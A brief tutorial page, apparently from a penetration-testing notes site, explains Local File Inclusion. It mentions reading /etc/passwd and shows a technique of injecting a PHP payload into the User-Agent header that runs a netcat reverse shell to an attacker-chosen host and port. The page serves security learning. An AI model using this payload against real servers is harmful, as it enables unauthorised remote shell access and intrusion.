Local File Inclusion
What is a Local File Inclusion?
This vulnerability able the attacker to see files from inside the server like the /etc/passwd or others.
Quick Example
In the following image we see that changing the file that the parameter page is loading we can see other files outside www directory, and we can try to exploit them to gain access with a shell.
Right here you see that pointing to /proc/self/environ, and modifying our user agent to:
<? passthru("nc -e /bin/bash <host> <port>"); ?>
Foward the requests and you will see that you will get a shell.
Examples and Info:
🪜pageDirectory TraversalLast updated